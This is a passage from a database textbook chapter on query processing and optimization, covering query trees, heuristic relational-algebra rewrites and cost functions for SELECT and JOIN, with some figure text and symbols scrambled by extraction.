example, if a join operation follows two select operations on base relations, the
tuples resulting from each select are provided as input for the join algorithm in a
stream or pipeline as they are produced.

7 Using Heuristics in Query Optimization
In this section we discuss optimization techniques that apply heuristic rules to
modify the internal representation of a query—which is usually in the form of a
query tree or a query graph data structure—to improve its expected performance.
The scanner and parser of an SQL query first generate a data structure that corre-
sponds to an initial query representation, which is then optimized according to
heuristic rules. This leads to an optimized query representation, which corresponds
to the query execution strategy. Following that, a query execution plan is generated

705

Algorithms for Query Processing and Optimization

to execute groups of operations based on the access paths available on the files
involved in the query.

One of the main heuristic rules is to apply SELECT and PROJECT operations before
applying the JOIN or other binary operations, because the size of the file resulting
from a binary operation—such as JOIN—is usually a multiplicative function of the
sizes of the input files. The SELECT and PROJECT operations reduce the size of a file
and hence should be applied before a join or other binary operation.

In Section 7.1 we discuss query tree and query graph notations in the context of
relational algebra and calculus. These can be used as the basis for the data structures
that are used for internal representation of queries. A query tree is used to represent
a relational algebra or extended relational algebra expression, whereas a query graph
is used to represent a relational calculus expression. Then in Section 7.2 we show how
heuristic optimization rules are applied to convert an initial query tree into an
equivalent query tree, which represents a different relational algebra expression
that is more efficient to execute but gives the same result as the original tree. We also
discuss the equivalence of various relational algebra expressions. Finally, Section 7.3
discusses the generation of query execution plans.

7.1 Notation for Query Trees and Query Graphs
A query tree is a tree data structure that corresponds to a relational algebra expres-
sion. It represents the input relations of the query as leaf nodes of the tree, and rep-
resents the relational algebra operations as internal nodes. An execution of the
query tree consists of executing an internal node operation whenever its operands
are available and then replacing that internal node by the relation that results from
executing the operation. The order of execution of operations starts at the leaf nodes,
which represents the input database relations for the query, and ends at the root
node, which represents the final operation of the query. The execution terminates
when the root node operation is executed and produces the result relation for the
query.

Figure 4a shows a query tree: For every project located in ‘Stafford’, retrieve the proj-
ect number, the controlling department number, and the department manager’s last
name, address, and birthdate. This query is specified on the COMPANY relational
schema in Figure A.1 and corresponds to the following relational algebra expres-
sion:

πPnumber, Dnum, Lname, Address, Bdate (((σPlocation=‘Stafford’(PROJECT))

Dnum=Dnumber(DEPARTMENT)) Mgr_ssn=Ssn(EMPLOYEE))

This corresponds to the following SQL query:

Q2: SELECT P.Pnumber, P.Dnum, E.Lname, E.Address, E.Bdate
FROM PROJECT AS P, DEPARTMENT AS D, EMPLOYEE AS E
WHERE P.Dnum=D.Dnumber AND D.Mgr_ssn=E.Ssn AND

P.Plocation= ‘Stafford’;

706

Algorithms for Query Processing and Optimization

(b)

(a)

E

DP

P.Pnumber, P.Dnum, E.Lname, E.Address, E.Bdate
π

P.Dnum=D.Dnumber AND D.Mgr_ssn=E.Ssn AND P.Plocation=‘Stafford’
σ

(c)

EDP

[P.Pnumber, P.Dnum] [E.Lname, E.Address, E.Bdate]

P.Dnum=D.Dnumber

P.Plocation=‘Stafford’

D.Mgr_ssn=E.Ssn

‘Stafford’

XX

XX

(1)

(2)

(3)

P.Pnumber,P.Dnum,E.Lname,E.Address,E.Bdateπ

D.Mgr_ssn=E.Ssn

P.Dnum=D.Dnumber

σP.Plocation= ‘Stafford’

E

D

P

EMPLOYEE

DEPARTMENT

PROJECT

Figure 4
Two query trees for the query Q2. (a) Query tree corresponding to the relational algebra
expression for Q2. (b) Initial (canonical) query tree for SQL query Q2. (c) Query graph for Q2.

In Figure 4a, the leaf nodes P, D, and E represent the three relations PROJECT,
DEPARTMENT, and EMPLOYEE, respectively, and the internal tree nodes represent
the relational algebra operations of the expression. When this query tree is executed,
the node marked (1) in Figure 4a must begin execution before node (2) because
some resulting tuples of operation (1) must be available before we can begin execut-
ing operation (2). Similarly, node (2) must begin executing and producing results
before node (3) can start execution, and so on.

As we can see, the query tree represents a specific order of operations for executing
a query. A more neutral data structure for representation of a query is the query
graph notation. Figure 4c shows the query graph for query Q2. Relations in the

707

Algorithms for Query Processing and Optimization

query are represented by relation nodes, which are displayed as single circles.
Constant values, typically from the query selection conditions, are represented by
constant nodes, which are displayed as double circles or ovals. Selection and join
conditions are represented by the graph edges, as shown in Figure 4c. Finally, the
attributes to be retrieved from each relation are displayed in square brackets above
each relation.

The query graph representation does not indicate an order on which operations to
perform first. There is only a single graph corresponding to each query.15 Although
some optimization techniques were based on query graphs, it is now generally
accepted that query trees are preferable because, in practice, the query optimizer
needs to show the order of operations for query execution, which is not possible in
query graphs.

7.2 Heuristic Optimization of Query Trees
In general, many different relational algebra expressions—and hence many different
query trees—can be equivalent; that is, they can represent the same query.16

The query parser will typically generate a standard initial query tree to correspond
to an SQL query, without doing any optimization. For example, for a SELECT-
PROJECT-JOIN query, such as Q2, the initial tree is shown in Figure 4(b). The
CARTESIAN PRODUCT of the relations specified in the FROM clause is first applied;
then the selection and join conditions of the WHERE clause are applied, followed by
the projection on the SELECT clause attributes. Such a canonical query tree repre-
sents a relational algebra expression that is very inefficient if executed directly,
because of the CARTESIAN PRODUCT (×) operations. For example, if the PROJECT,
DEPARTMENT, and EMPLOYEE relations had record sizes of 100, 50, and 150 bytes
and contained 100, 20, and 5,000 tuples, respectively, the result of the CARTESIAN
PRODUCT would contain 10 million tuples of record size 300 bytes each. However,
the initial query tree in Figure 4(b) is in a simple standard form that can be easily
created from the SQL query. It will never be executed. The heuristic query opti-
mizer will transform this initial query tree into an equivalent final query tree that is
efficient to execute.

The optimizer must include rules for equivalence among relational algebra expres-
sions that can be applied to transform the initial tree into the final, optimized query
tree. First we discuss informally how a query tree is transformed by using heuristics,
and then we discuss general transformation rules and show how they can be used in
an algebraic heuristic optimizer.

Example of Transforming a Query. Consider the following query Q on the
database in Figure A.1: Find the last names of employees born after 1957 who work on
a project named ‘Aquarius’. This query can be specified in SQL as follows:

15Hence, a query graph corresponds to a relational calculus expression.
16The same query may also be stated in various ways in a high-level query language such as SQL.

708

Algorithms for Query Processing and Optimization

Q: SELECT Lname
FROM EMPLOYEE, WORKS_ON, PROJECT
WHERE Pname=‘Aquarius’ AND Pnumber=Pno AND Essn=Ssn

AND Bdate > ‘1957-12-31’;

The initial query tree for Q is shown in Figure 5(a). Executing this tree directly first
creates a very large file containing the CARTESIAN PRODUCT of the entire
EMPLOYEE, WORKS_ON, and PROJECT files. That is why the initial query tree is
never executed, but is transformed into another equivalent tree that is efficient to

(a) Lname

Pname=‘Aquarius’ AND Pnumber=Pno AND Essn=Ssn AND Bdate>‘1957-12-31’

PROJECT

WORKS_ONEMPLOYEE

(b) Lname

Pnumber=Pno

Bdate>‘1957-12-31’

Pname=‘Aquarius’Essn=Ssn

π

π

σ

σ

σσ

σ

EMPLOYEE

PROJECT

WORKS_ON

X

X

X

X

Figure 5
Steps in converting a query tree during heuristic optimization.
(a) Initial (canonical) query tree for SQL query Q.
(b) Moving SELECT operations down the query tree.
(c) Applying the more restrictive SELECT operation first.
(d) Replacing CARTESIAN PRODUCT and SELECT with JOIN operations.
(e) Moving PROJECT operations down the query tree.

709

Algorithms for Query Processing and Optimization

(e) π Lname

σBdate>‘1957-12-31’

σPname=‘Aquarius’

πPnumber πEssn,Pno

π Essn
πSsn, Lname

EMPLOYEE

WORKS_ON

PROJECT

(d)
π Lname

σBdate>‘1957-12-31’

σPname=‘Aquarius’ EMPLOYEEWORKS_ON

PROJECT

Essn=Ssn

Pnumber=Pno

Pnumber=Pno

Essn=Ssn

(c)

σ Essn=Ssn

π Lname

σ Pnumber=Pno σBdate>‘1957-12-31’

σ
Pname=‘Aquarius’

EMPLOYEE

WORKS_ON

PROJECT

X

X

710

execute. This particular query needs only one record from the PROJECT relation—
for the ‘Aquarius’ project—and only the EMPLOYEE records for those whose date of
birth is after ‘1957-12-31’. Figure 5(b) shows an improved query tree that first
applies the SELECT operations to reduce the number of tuples that appear in the
CARTESIAN PRODUCT.

A further improvement is achieved by switching the positions of the EMPLOYEE and
PROJECT relations in the tree, as shown in Figure 5(c). This uses the information
that Pnumber is a key attribute of the PROJECT relation, and hence the SELECT
operation on the PROJECT relation will retrieve a single record only. We can further
improve the query tree by replacing any CARTESIAN PRODUCT operation that is
followed by a join condition with a JOIN operation, as shown in Figure 5(d).
Another improvement is to keep only the attributes needed by subsequent opera-
tions in the intermediate relations, by including PROJECT (π) operations as early as
possible in the query tree, as shown in Figure 5(e). This reduces the attributes
(columns) of the intermediate relations, whereas the SELECT operations reduce the
number of tuples (records).

As the preceding example demonstrates, a query tree can be transformed step by
step into an equivalent query tree that is more efficient to execute. However, we
must make sure that the transformation steps always lead to an equivalent query
tree. To do this, the query optimizer must know which transformation rules preserve
this equivalence. We discuss some of these transformation rules next.

General Transformation Rules for Relational Algebra Operations. There
are many rules for transforming relational algebra operations into equivalent ones.
For query optimization purposes, we are interested in the meaning of the opera-
tions and the resulting relations. Hence, if two relations have the same set of attrib-
utes in a different order but the two relations represent the same information, we
consider the relations to be equivalent. There is an alternative definition of relation
that makes the order of attributes unimportant; we will use this definition here. We
will state some transformation rules that are useful in query optimization, without
proving them:

1. Cascade of σ A conjunctive selection condition can be broken up into a cas-
cade (that is, a sequence) of individual σ operations:
σc1 AND c2 AND . . . AND cn

(R)� σc1
(σc2

(…(σcn
(R))…))

2. Commutativity of σσ. The σ operation is commutative:
σc1

(σc2
(R)) � σc2

(σc1
(R))

3. Cascade of ππ. In a cascade (sequence) of π operations, all but the last one can
be ignored:

πList1
(πList2

(…(πListn
(R))…)) � πList1

(R)

4. Commuting σ with π. If the selection condition c involves only those attrib-
utes A1, . . . , An in the projection list, the two operations can be commuted:

πA1, A2, …, An
(σc (R)) � σc (πA1, A2, …, An

(R))

Algorithms for Query Processing and Optimization

711

Algorithms for Query Processing and Optimization

5. Commutativity of (and ××). The join operation is commutative, as is the
× operation:
R c S ≡ S c R
R × S ≡ S × R

Notice that although the order of attributes may not be the same in the rela-
tions resulting from the two joins (or two Cartesian products), the meaning
is the same because the order of attributes is not important in the alternative
definition of relation.

6. Commuting σσ with (or ××). If all the attributes in the selection condition
c involve only the attributes of one of the relations being joined—say, R—the
two operations can be commuted as follows:

σc (R S) ≡ (σc (R)) S
Alternatively, if the selection condition c can be written as (c1 AND c2), where
condition c1 involves only the attributes of R and condition c2 involves only
the attributes of S, the operations commute as follows:

σc (R S) � (σc1
(R)) (σc2

(S))

The same rules apply if the is replaced by a × operation.

7. Commuting ππ with (or ××). Suppose that the projection list is L = {A1, …,
An, B1, …, Bm} , where A1, …, An are attributes of R and B1, …, Bm are attrib-
utes of S. If the join condition c involves only attributes in L, the two opera-
tions can be commuted as follows:

πL (R c S) � (πA1, …, An
(R)) c (πB1, …, Bm

(S))

If the join condition c contains additional attributes not in L, these must be
added to the projection list, and a final π operation is needed. For example, if
attributes An+1, …, An+k of R and Bm+1, …, Bm+p of S are involved in the join
condition c but are not in the projection list L, the operations commute as
follows:

πL (R c S) � πL ((πA1, …, An, An+1, …, An+k
(R)) c (πB1, …, Bm, Bm+1, …, Bm+p

(S)))

For ×, there is no condition c, so the first transformation rule always applies
by replacing c with ×.

8. Commutativity of set operations. The set operations ∪ and ∩ are commu-
tative but − is not.

9. Associativity of , ××, ∪∪, and ∩∩. These four operations are individually
associative; that is, if θ stands for any one of these four operations (through-
out the expression), we have:

(R θ S) θ T ≡ R θ (S θ T)

10. Commuting σ with set operations. The σ operation commutes with ∪, ∩,
and −. If θ stands for any one of these three operations (throughout the
expression), we have:

σc (R θ S) ≡ (σc (R)) θ (σc (S))

712

Algorithms for Query Processing and Optimization

11. The π operation commutes with ∪∪.
πL (R ∪ S) ≡ (πL (R)) ∪ (πL (S))

12. Converting a (σσ, ××) sequence into . If the condition c of a σ that follows a
× corresponds to a join condition, convert the (σ, ×) sequence into a as
follows:

(σc (R × S)) ≡ (R c S)

There are other possible transformations. For example, a selection or join condition
c can be converted into an equivalent condition by using the following standard
rules from Boolean algebra (DeMorgan’s laws):

NOT (c1 AND c2) ≡ (NOT c1) OR (NOT c2)
NOT (c1 OR c2) ≡ (NOT c1) AND (NOT c2)

We discuss next how transformations can be used in heuristic optimization.

Outline of a Heuristic Algebraic Optimization Algorithm. We can now out-
line the steps of an algorithm that utilizes some of the above rules to transform an
initial query tree into a final tree that is more efficient to execute (in most cases).
The algorithm will lead to transformations similar to those discussed in our exam-
ple in Figure 5. The steps of the algorithm are as follows:

1. Using Rule 1, break up any SELECT operations with conjunctive conditions
into a cascade of SELECT operations. This permits a greater degree of free-
dom in moving SELECT operations down different branches of the tree.

2. Using Rules 2, 4, 6, and 10 concerning the commutativity of SELECT with
other operations, move each SELECT operation as far down the query tree as
is permitted by the attributes involved in the select condition. If the condi-
tion involves attributes from only one table, which means that it represents a
selection condition, the operation is moved all the way to the leaf node that
represents this table. If the condition involves attributes from two tables,
which means that it represents a join condition, the condition is moved to a
location down the tree after the two tables are combined.

3. Using Rules 5 and 9 concerning commutativity and associativity of binary
operations, rearrange the leaf nodes of the tree using the following criteria.
First, position the leaf node relations with the most restrictive SELECT oper-
ations so they are executed first in the query tree representation. The defini-
tion of most restrictive SELECT can mean either the ones that produce a
relation with the fewest tuples or with the smallest absolute size.17 Another
possibility is to define the most restrictive SELECT as the one with the small-
est selectivity; this is more practical because estimates of selectivities are
often available in the DBMS catalog. Second, make sure that the ordering of
leaf nodes does not cause CARTESIAN PRODUCT operations; for example, if

17Either definition can be used, since these rules are heuristic.

713

Algorithms for Query Processing and Optimization

the two relations with the most restrictive SELECT do not have a direct join
condition between them, it may be desirable to change the order of leaf
nodes to avoid Cartesian products.18

4. Using Rule 12, combine a CARTESIAN PRODUCT operation with a subse-
quent SELECT operation in the tree into a JOIN operation, if the condition
represents a join condition.

5. Using Rules 3, 4, 7, and 11 concerning the cascading of PROJECT and the
commuting of PROJECT with other operations, break down and move lists
of projection attributes down the tree as far as possible by creating new
PROJECT operations as needed. Only those attributes needed in the query
result and in subsequent operations in the query tree should be kept after
each PROJECT operation.

6. Identify subtrees that represent groups of operations that can be executed by
a single algorithm.

In our example, Figure 5(b) shows the tree in Figure 5(a) after applying steps 1 and
2 of the algorithm; Figure 5(c) shows the tree after step 3; Figure 5(d) after step 4;
and Figure 5(e) after step 5. In step 6 we may group together the operations in the
subtree whose root is the operation πEssn into a single algorithm. We may also group
the remaining operations into another subtree, where the tuples resulting from the
first algorithm replace the subtree whose root is the operation πEssn, because the
first grouping means that this subtree is executed first.

Summary of Heuristics for Algebraic Optimization. The main heuristic is to
apply first the operations that reduce the size of intermediate results. This includes
performing as early as possible SELECT operations to reduce the number of tuples
and PROJECT operations to reduce the number of attributes—by moving SELECT
and PROJECT operations as far down the tree as possible. Additionally, the SELECT
and JOIN operations that are most restrictive—that is, result in relations with the
fewest tuples or with the smallest absolute size—should be executed before other
similar operations. The latter rule is accomplished through reordering the leaf
nodes of the tree among themselves while avoiding Cartesian products, and adjust-
ing the rest of the tree appropriately.

7.3 Converting Query Trees into Query Execution Plans
An execution plan for a relational algebra expression represented as a query tree
includes information about the access methods available for each relation as well as
the algorithms to be used in computing the relational operators represented in the
tree. As a simple example, consider query Q1, whose corresponding relational alge-
bra expression is

πFname, Lname, Address(σDname=‘Research’(DEPARTMENT) Dnumber=Dno EMPLOYEE)

18Note that a CARTESIAN PRODUCT is acceptable in some cases—for example, if each relation has
only a single tuple because each had a previous select condition on a key field.

714

Algorithms for Query Processing and Optimization

π Fname, Lname, Address

σ Dname=‘Research’

DEPARTMENT

EMPLOYEE

Dnumber=Dno

Figure 6
A query tree for query Q1.

The query tree is shown in Figure 6. To convert this into an execution plan, the opti-
mizer might choose an index search for the SELECT operation on DEPARTMENT
(assuming one exists), a single-loop join algorithm that loops over the records in the
result of the SELECT operation on DEPARTMENT for the join operation (assuming
an index exists on the Dno attribute of EMPLOYEE), and a scan of the JOIN result for
input to the PROJECT operator. Additionally, the approach taken for executing the
query may specify a materialized or a pipelined evaluation, although in general a
pipelined evaluation is preferred whenever feasible.

With materialized evaluation, the result of an operation is stored as a temporary
relation (that is, the result is physically materialized). For instance, the JOIN opera-
tion can be computed and the entire result stored as a temporary relation, which is
then read as input by the algorithm that computes the PROJECT operation, which
would produce the query result table. On the other hand, with pipelined
evaluation, as the resulting tuples of an operation are produced, they are forwarded
directly to the next operation in the query sequence. For example, as the selected
tuples from DEPARTMENT are produced by the SELECT operation, they are placed
in a buffer; the JOIN operation algorithm would then consume the tuples from the
buffer, and those tuples that result from the JOIN operation are pipelined to the pro-
jection operation algorithm. The advantage of pipelining is the cost savings in not
having to write the intermediate results to disk and not having to read them back for
the next operation.

8 Using Selectivity and Cost Estimates
in Query Optimization

A query optimizer does not depend solely on heuristic rules; it also estimates and
compares the costs of executing a query using different execution strategies and
algorithms, and it then chooses the strategy with the lowest cost estimate. For this
approach to work, accurate cost estimates are required so that different strategies can
be compared fairly and realistically. In addition, the optimizer must limit the num-
ber of execution strategies to be considered; otherwise, too much time will be spent
making cost estimates for the many possible execution strategies. Hence, this
approach is more suitable for compiled queries where the optimization is done at
compile time and the resulting execution strategy code is stored and executed
directly at runtime. For interpreted queries, where the entire process shown in

715

Algorithms for Query Processing and Optimization

Figure 1 occurs at runtime, a full-scale optimization may slow down the response
time. A more elaborate optimization is indicated for compiled queries, whereas a
partial, less time-consuming optimization works best for interpreted queries.

This approach is generally referred to as cost-based query optimization.19 It uses
traditional optimization techniques that search the solution space to a problem for a
solution that minimizes an objective (cost) function. The cost functions used in
query optimization are estimates and not exact cost functions, so the optimization
may select a query execution strategy that is not the optimal (absolute best) one. In
Section 8.1 we discuss the components of query execution cost. In Section 8.2 we
discuss the type of information needed in cost functions. This information is kept
in the DBMS catalog. In Section 8.3 we give examples of cost functions for the
SELECT operation, and in Section 8.4 we discuss cost functions for two-way JOIN
operations. Section 8.5 discusses multiway joins, and Section 8.6 gives an example.

8.1 Cost Components for Query Execution
The cost of executing a query includes the following components:

1. Access cost to secondary storage. This is the cost of transferring (reading
and writing) data blocks between secondary disk storage and main memory
buffers. This is also known as disk I/O (input/output) cost. The cost of search-
ing for records in a disk file depends on the type of access structures on that
file, such as ordering, hashing, and primary or secondary indexes. In addi-
tion, factors such as whether the file blocks are allocated contiguously on the
same disk cylinder or scattered on the disk affect the access cost.

2. Disk storage cost. This is the cost of storing on disk any intermediate files
that are generated by an execution strategy for the query.

3. Computation cost. This is the cost of performing in-memory operations on
the records within the data buffers during query execution. Such operations
include searching for and sorting records, merging records for a join or a sort
operation, and performing computations on field values. This is also known
as CPU (central processing unit) cost.

4. Memory usage cost. This is the cost pertaining to the number of main mem-
ory buffers needed during query execution.

5. Communication cost. This is the cost of shipping the query and its results
from the database site to the site or terminal where the query originated. In
distributed databases, it would also include the cost of transferring tables and
results among various computers during query evaluation.

For large databases, the main emphasis is often on minimizing the access cost to sec-
ondary storage. Simple cost functions ignore other factors and compare different
query execution strategies in terms of the number of block transfers between disk

19This approach was first used in the optimizer for the SYSTEM R in an experimental DBMS developed
at IBM (Selinger et al. 1979).

716

Algorithms for Query Processing and Optimization

and main memory buffers. For smaller databases, where most of the data in the files
involved in the query can be completely stored in memory, the emphasis is on min-
imizing computation cost. In distributed databases, where many sites are involved,
communication cost must be minimized also. It is difficult to include all the cost
components in a (weighted) cost function because of the difficulty of assigning suit-
able weights to the cost components. That is why some cost functions consider a
single factor only—disk access. In the next section we discuss some of the informa-
tion that is needed for formulating cost functions.

8.2 Catalog Information Used in Cost Functions
To estimate the costs of various execution strategies, we must keep track of any
information that is needed for the cost functions. This information may be stored in
the DBMS catalog, where it is accessed by the query optimizer. First, we must know
the size of each file. For a file whose records are all of the same type, the number of
records (tuples) (r), the (average) record size (R), and the number of file blocks (b)
(or close estimates of them) are needed. The blocking factor (bfr) for the file may
also be needed. We must also keep track of the primary file organization for each file.
The primary file organization records may be unordered, ordered by an attribute
with or without a primary or clustering index, or hashed (static hashing or one of
the dynamic hashing methods) on a key attribute. Information is also kept on all
primary, secondary, or clustering indexes and their indexing attributes. The number
of levels (x) of each multilevel index (primary, secondary, or clustering) is needed
for cost functions that estimate the number of block accesses that occur during
query execution. In some cost functions the number of first-level index blocks
(bI1) is needed.

Another important parameter is the number of distinct values (d) of an attribute
and the attribute selectivity (sl), which is the fraction of records satisfying an equal-
ity condition on the attribute. This allows estimation of the selection cardinality (s
= sl*r) of an attribute, which is the average number of records that will satisfy an
equality selection condition on that attribute. For a key attribute, d = r, sl = 1/r and s
= 1. For a nonkey attribute, by making an assumption that the d distinct values are
uniformly distributed among the records, we estimate sl = (1/d) and so s = (r/d).20

Information such as the number of index levels is easy to maintain because it does
not change very often. However, other information may change frequently; for
example, the number of records r in a file changes every time a record is inserted or
deleted. The query optimizer will need reasonably close but not necessarily com-
pletely up-to-the-minute values of these parameters for use in estimating the cost of
various execution strategies.

For a nonkey attribute with d distinct values, it is often the case that the records are
not uniformly distributed among these values. For example, suppose that a com-
pany has 5 departments numbered 1 through 5, and 200 employees who are distrib-

20More accurate optimizers store histograms of the distribution of records over the data values for an
attribute.

717

Algorithms for Query Processing and Optimization

uted among the departments as follows: (1, 5), (2, 25), (3, 70), (4, 40), (5, 60). In
such cases, the optimizer can store a histogram that reflects the distribution of
employee records over different departments in a table with the two attributes (Dno,
Selectivity), which would contain the following values for our example: (1, 0.025), (2,
0.125), (3, 0.35), (4, 0.2), (5, 0.3). The selectivity values stored in the histogram can
also be estimates if the employee table changes frequently.

In the next two sections we examine how some of these parameters are used in cost
functions for a cost-based query optimizer.

8.3 Examples of Cost Functions for SELECT
We now give cost functions for the selection algorithms S1 to S8 discussed in
Section 3.1 in terms of number of block transfers between memory and disk.
Algorithm S9 involves an intersection of record pointers after they have been
retrieved by some other means, such as algorithm S6, and so the cost function will
be based on the cost for S6. These cost functions are estimates that ignore compu-
tation time, storage cost, and other factors. The cost for method Si is referred to as
CSi block accesses.

■ S1—Linear search (brute force) approach. We search all the file blocks to
retrieve all records satisfying the selection condition; hence, CS1a = b. For an
equality condition on a key attribute, only half the file blocks are searched on
the average before finding the record, so a rough estimate for CS1b = (b/2) if
the record is found; if no record is found that satisfies the condition, CS1b = b.

■ S2—Binary search. This search accesses approximately CS2 = log2b +
⎡(s/bfr)⎤ − 1 file blocks. This reduces to log2b if the equality condition is on a
unique (key) attribute, because s = 1 in this case.

■ S3a—Using a primary index to retrieve a single record. For a primary
index, retrieve one disk block at each index level, plus one disk block from
the data file. Hence, the cost is one more disk block than the number of
index levels: CS3a = x + 1.

■ S3b—Using a hash key to retrieve a single record. For hashing, only one
disk block needs to be accessed in most cases. The cost function is approxi-
mately CS3b = 1 for static hashing or linear hashing, and it is 2 disk block
accesses for extendible hashing.

■ S4—Using an ordering index to retrieve multiple records. If the compari-
son condition is >, >=, <, or <= on a key field with an ordering index, roughly half the file records will satisfy the condition. This gives a cost func- tion of CS4 = x + (b/2). This is a very rough estimate, and although it may be correct on the average, it may be quite inaccurate in individual cases. A more accurate estimate is possible if the distribution of records is stored in a his- togram. ■ S5—Using a clustering index to retrieve multiple records. One disk block is accessed at each index level, which gives the address of the first file disk block in the cluster. Given an equality condition on the indexing attribute, s 718 Algorithms for Query Processing and Optimization records will satisfy the condition, where s is the selection cardinality of the indexing attribute. This means that ⎡(s/bfr)⎤ file blocks will be in the cluster of file blocks that hold all the selected records, giving CS5 = x + ⎡(s/bfr)⎤. ■ S6—Using a secondary (B+-tree) index. For a secondary index on a key (unique) attribute, the cost is x + 1 disk block accesses. For a secondary index on a nonkey (nonunique) attribute, s records will satisfy an equality condition, where s is the selection cardinality of the indexing attribute. However, because the index is nonclustering, each of the records may reside on a different disk block, so the (worst case) cost estimate is CS6a = x + 1 + s. The additional 1 is to account for the disk block that contains the record pointers after the index is searched. If the comparison condition is >, >=, <, or <= and half the file records are assumed to satisfy the condition, then (very roughly) half the first- level index blocks are accessed, plus half the file records via the index. The cost estimate for this case, approximately, is CS6b = x + (bI1/2) + (r/2). The r/2 fac- tor can be refined if better selectivity estimates are available through a his- togram. The latter method CS6b can be very costly. ■ S7—Conjunctive selection. We can use either S1 or one of the methods S2 to S6 discussed above. In the latter case, we use one condition to retrieve the records and then check in the main memory buffers whether each retrieved record satisfies the remaining conditions in the conjunction. If multiple indexes exist, the search of each index can produce a set of record pointers (record ids) in the main memory buffers. The intersection of the sets of record pointers (referred to in S9) can be computed in main memory, and then the resulting records are retrieved based on their record ids. ■ S8—Conjunctive selection using a composite index. Same as S3a, S5, or S6a, depending on the type of index. Example of Using the Cost Functions. In a query optimizer, it is common to enumerate the various possible strategies for executing a query and to estimate the costs for different strategies. An optimization technique, such as dynamic program- ming, may be used to find the optimal (least) cost estimate efficiently, without hav- ing to consider all possible execution strategies. We do not discuss optimization algorithms here; rather, we use a simple example to illustrate how cost estimates may be used. Suppose that the EMPLOYEE file in Figure A.1 has rE = 10,000 records stored in bE = 2000 disk blocks with blocking factor bfrE = 5 records/block and the following access paths: 1. A clustering index on Salary, with levels xSalary = 3 and average selection car- dinality sSalary = 20. (This corresponds to a selectivity of slSalary = 0.002). 2. A secondary index on the key attribute Ssn, with xSsn = 4 (sSsn = 1, slSsn = 0.0001). 3. A secondary index on the nonkey attribute Dno, with xDno = 2 and first-level index blocks bI1Dno = 4. There are dDno = 125 distinct values for Dno, so the selectivity of Dno is slDno = (1/dDno) = 0.008, and the selection cardinality is sDno = (rE * slDno) = (rE/dDno) = 80. 719 Algorithms for Query Processing and Optimization 4. A secondary index on Sex, with xSex = 1. There are dSex = 2 values for the Sex attribute, so the average selection cardinality is sSex = (rE/dSex) = 5000. (Note that in this case, a histogram giving the percentage of male and female employees may be useful, unless they are approximately equal.) We illustrate the use of cost functions with the following examples: OP1: σSsn=‘123456789’(EMPLOYEE) OP2: σDno>5(EMPLOYEE)

OP3: σDno=5(EMPLOYEE)

OP4: σDno=5 AND SALARY>30000 AND Sex=‘F’(EMPLOYEE)

The cost of the brute force (linear search or file scan) option S1 will be estimated as
CS1a = bE = 2000 (for a selection on a nonkey attribute) or CS1b = (bE/2) = 1000
(average cost for a selection on a key attribute). For OP1 we can use either method
S1 or method S6a; the cost estimate for S6a is CS6a = xSsn + 1 = 4 + 1 = 5, and it is
chosen over method S1, whose average cost is CS1b = 1000. For OP2 we can use
either method S1 (with estimated cost CS1a = 2000) or method S6b (with estimated
cost CS6b = xDno + (bI1Dno/2) + (rE /2) = 2 + (4/2) + (10,000/2) = 5004), so we choose
the linear search approach for OP2. For OP3 we can use either method S1 (with esti-
mated cost CS1a = 2000) or method S6a (with estimated cost CS6a = xDno + sDno = 2
+ 80 = 82), so we choose method S6a.

Finally, consider OP4, which has a conjunctive selection condition. We need to esti-
mate the cost of using any one of the three components of the selection condition to
retrieve the records, plus the linear search approach. The latter gives cost estimate
CS1a = 2000. Using the condition (Dno = 5) first gives the cost estimate CS6a = 82.
Using the condition (Salary > 30,000) first gives a cost estimate CS4 = xSalary + (bE/2)
= 3 + (2000/2) = 1003. Using the condition (Sex = ‘F’) first gives a cost estimate CS6a
= xSex + sSex = 1 + 5000 = 5001. The optimizer would then choose method S6a on
the secondary index on Dno because it has the lowest cost estimate. The condition
(Dno = 5) is used to retrieve the records, and the remaining part of the conjunctive
condition (Salary > 30,000 AND Sex = ‘F’) is checked for each selected record after it
is retrieved into memory. Only the records that satisfy these additional conditions
are included in the result of the operation.

8.4 Examples of Cost Functions for JOIN
To develop reasonably accurate cost functions for JOIN operations, we need to have
an estimate for the size (number of tuples) of the file that results after the JOIN oper-
ation. This is usually kept as a ratio of the size (number of tuples) of the resulting
join file to the size of the CARTESIAN PRODUCT file, if both are applied to the same
input files, and it is called the join selectivity ( js). If we denote the number of tuples
of a relation R by |R|, we have:

js = |(R c S)| / |(R × S)| = |(R c S)| / (|R| * |S|)

If there is no join condition c, then js = 1 and the join is the same as the CARTESIAN
PRODUCT. If no tuples from the relations satisfy the join condition, then js = 0. In

720

Algorithms for Query Processing and Optimization

general, 0 ≤ js ≤ 1. For a join where the condition c is an equality comparison R.A =
S.B, we get the following two special cases:

1. If A is a key of R, then |(R c S)| ≤ |S|, so js ≤ (1/|R|). This is because each
record in file S will be joined with at most one record in file R, since A is a key
of R. A special case of this condition is when attribute B is a foreign key of S
that references the primary key A of R. In addition, if the foreign key B has
the NOT NULL constraint, then js = (1/|R|), and the result file of the join
will contain |S| records.

2. If B is a key of S, then |(R c S)| ≤ |R|, so js ≤ (1/|S|).

Having an estimate of the join selectivity for commonly occurring join conditions
enables the query optimizer to estimate the size of the resulting file after the join
operation, given the sizes of the two input files, by using the formula |(R c S)| = js

* |R| * |S|. We can now give some sample approximate cost functions for estimating
the cost of some of the join algorithms given in Section 3.2. The join operations are
of the form:

R A=B S

where A and B are domain-compatible attributes of R and S, respectively. Assume
that R has bR blocks and that S has bS blocks:

■ J1—Nested-loop join. Suppose that we use R for the outer loop; then we get
the following cost function to estimate the number of block accesses for this
method, assuming three memory buffers. We assume that the blocking factor
for the resulting file is bfrRS and that the join selectivity is known:

CJ1 = bR + (bR * bS) + (( js * |R| * |S|)/bfrRS)

The last part of the formula is the cost of writing the resulting file to disk.
This cost formula can be modified to take into account different numbers of
memory buffers, as presented in Section 3.2. If nB main memory buffers are
available to perform the join, the cost formula becomes:

CJ1 = bR + ( ⎡bR/(nB – 2)⎤ * bS) + ((js * |R| * |S|)/bfrRS)
■ J2—Single-loop join (using an access structure to retrieve the matching

record(s)). If an index exists for the join attribute B of S with index levels xB,
we can retrieve each record s in R and then use the index to retrieve all the
matching records t from S that satisfy t[B] = s[A]. The cost depends on the
type of index. For a secondary index where sB is the selection cardinality for
the join attribute B of S,21 we get:

CJ2a = bR + (|R| * (xB + 1 + sB)) + (( js * |R| * |S|)/bfrRS)

For a clustering index where sB is the selection cardinality of B, we get

CJ2b = bR + (|R| * (xB + (sB/bfrB))) + (( js * |R| * |S|)/bfrRS)

For a primary index, we get

21Selection cardinality was defined as the average number of records that satisfy an equality condition on
an attribute, which is the average number of records that have the same value for the attribute and hence
